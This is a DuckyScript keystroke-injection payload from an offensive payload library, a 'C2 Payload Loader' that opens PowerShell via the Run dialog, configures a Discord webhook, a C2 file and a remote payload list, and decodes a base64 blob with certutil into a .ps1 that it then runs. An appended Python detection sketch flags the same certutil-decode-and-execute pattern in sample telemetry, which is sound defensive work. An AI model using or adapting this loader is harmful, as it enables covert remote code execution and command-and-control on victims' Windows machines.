omg-payloads/payloads/library/execution/C2-Payload-Loader/Bootstrap-pLoader.txt


REM Title: BOOTSTRAP - C2 Payload Loader (pLoader) with Discord Reporting
REM Description: Bootstrap Payload for Remote (C2) Payload Loader with Discord Reporting.
REM This allows the payload to be executed on OMG Basic and other smaller devices. All
REM inputs below are needed to start the script, unless you know how to edit the source. OMG
REM and InfoSecREDD (REDD) are not responsible for the misuse of this Payload. This is
REM for Educational Purposes only.
REM IT IS ADVISED TO EDIT THE MAIN URL TO POINT TO A CUSTOM VERSION WITH YOUR VARIABLES
REM AUTHOR: InfoSecREDD
REM Version: 0.2
REM Category: Execution (REMOTE)
REM Compatibility: Flipper Zero AND DuckyScript Devices
REM Target: Windows
REM To use on Flipper Zero, REM out the DUCKY_LANG US line below
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 2000
REM Put your Discord webhook below.
STRING $webhook = "DiscordWebhookHere";
REM The C2 file must be hosted on GitHub unless you can edit the file. 1 = ON and 0 = OFF
STRING $ccontrol = "C2FileHere";
REM Put your Remote List of Payloads below.
STRING $URLS = "URLFileListHere";
REM Put your Timer file below. Range 10-18000; the value is counted in minutes.
STRING $timer = "TimerFileHere";
REM OVERDRIVE - Overdrive allows a payload to execute without waiting for the prior payload to finish. 1 = ON and 0 = OFF
STRING $overdrive = "OverdriveFileHere";
REM Let's run this thing.
STRING $TempFile = "$env:TEMP\temp.ps1"; $File = "$env:TEMP\l.ps1"; echo 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 > "$TempFile"; certutil -f -decode "$TempFile" "$File" | out-null; & "$env:TEMP\l.ps1"
DELAY 1000
ENTER
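The last STRING line is the part of this payload a defender can actually see on an endpoint: PowerShell opened from the Run dialog, a base64 blob echoed into %TEMP%, `certutil -f -decode` turning it into a `.ps1`, and that file invoked with `&`. The following Python is an added detection sketch written for this page; it is not part of the payload, the OMG project or InfoSecREDD's code. It runs three checks over constructed events whose field names only loosely follow Sysmon Event ID 1 (process creation) and PowerShell Event ID 4104 (script block logging); the paths, usernames and the `QUJDRA==` blob in the sample data are made up for the example, and the `-decode` into a temp directory does not spawn a new process for the `& "$env:TEMP\l.ps1"` step, which is why that step is matched in the script-block text rather than in process events.

```python
"""Detection sketch (added example, not project code) for the dropper pattern used by
this payload: certutil -decode into a user temp directory plus a PowerShell script block
that writes, decodes and executes a .ps1 from $env:TEMP. Sample events are CONSTRUCTED."""
import re

# A user-writable temp directory, written as a resolved path, a PowerShell variable or a cmd variable.
TEMP_DIR_RE = re.compile(r"(\\AppData\\Local\\Temp\\|\$env:TEMP\\|%TEMP%\\)", re.IGNORECASE)
# Script or executable extensions that should not normally be produced by certutil.
SCRIPT_EXT_RE = re.compile(r"\.(ps1|bat|cmd|vbs|js|exe|dll)\b", re.IGNORECASE)
# certutil invoked with -decode / -decodehex (MITRE ATT&CK T1140, Deobfuscate/Decode Files).
DECODE_RE = re.compile(r'certutil(\.exe)?"?\s+.*-decode', re.IGNORECASE)
# Call operator invoking a .ps1, e.g.  & "$env:TEMP\l.ps1"
INVOKE_PS1_RE = re.compile(r'&\s*"?[^"\s;]*\.ps1', re.IGNORECASE)

# Constructed sample telemetry (not from any real host). Index order matters for the checks below.
SAMPLE_EVENTS = [
    {"type": "process", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
    {"type": "process", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r'"C:\Windows\System32\certutil.exe" -f -decode '
                    r"C:\Users\u\AppData\Local\Temp\temp.ps1 C:\Users\u\AppData\Local\Temp\l.ps1"},
    {"type": "scriptblock",
     "ScriptBlockText": r'$TempFile = "$env:TEMP\temp.ps1"; $File = "$env:TEMP\l.ps1"; '
                        r'echo QUJDRA== > "$TempFile"; certutil -f -decode "$TempFile" "$File" '
                        r'| out-null; & "$env:TEMP\l.ps1"'},
    # Benign: certutil listing the personal certificate store.
    {"type": "process", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe", "CommandLine": "certutil -store My"},
    # Benign: a script block that merely touches the temp directory.
    {"type": "scriptblock", "ScriptBlockText": r"Get-ChildItem $env:TEMP\ -Filter *.log"},
]


def check_run_dialog_powershell(event):
    """Low-signal context: an interactive powershell.exe with a bare command line whose
    parent is explorer.exe, which is what GUI r + STRING powershell + ENTER produces."""
    if event.get("type") != "process":
        return None
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").strip().strip('"').lower()
    if parent.endswith("explorer.exe") and image.endswith("powershell.exe") \
            and cmd in ("powershell", "powershell.exe"):
        return "run_dialog_powershell"
    return None


def check_certutil_decode(event):
    """High-signal: certutil decoding into a temp directory with a script/executable extension."""
    if event.get("type") != "process":
        return None
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if image.endswith("certutil.exe") and DECODE_RE.search(cmd) \
            and TEMP_DIR_RE.search(cmd) and SCRIPT_EXT_RE.search(cmd):
        return "certutil_decode_to_temp_script"
    return None


def check_scriptblock_dropper(event):
    """High-signal: one script block that references $env:TEMP, decodes with certutil
    and invokes a .ps1 with the call operator."""
    if event.get("type") != "scriptblock":
        return None
    text = event.get("ScriptBlockText", "")
    if TEMP_DIR_RE.search(text) and DECODE_RE.search(text) and INVOKE_PS1_RE.search(text):
        return "powershell_temp_decode_and_execute"
    return None


RULES = [
    (check_run_dialog_powershell, "low"),
    (check_certutil_decode, "high"),
    (check_scriptblock_dropper, "high"),
]


def triage(events):
    """Run every rule over every event; return one finding per (event, rule) hit."""
    findings = []
    for index, event in enumerate(events):
        for rule, severity in RULES:
            name = rule(event)
            if name:
                findings.append({"index": index, "rule": name, "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] event {finding['index']}: {finding['rule']}")
```

The Run-dialog check is deliberately scored low: users open PowerShell that way too, so it is only useful as corroboration next to the certutil or script-block hit on the same host within a short window. The script-block rule depends on PowerShell script block logging being enabled, which is the setting that makes the `&` invocation visible at all.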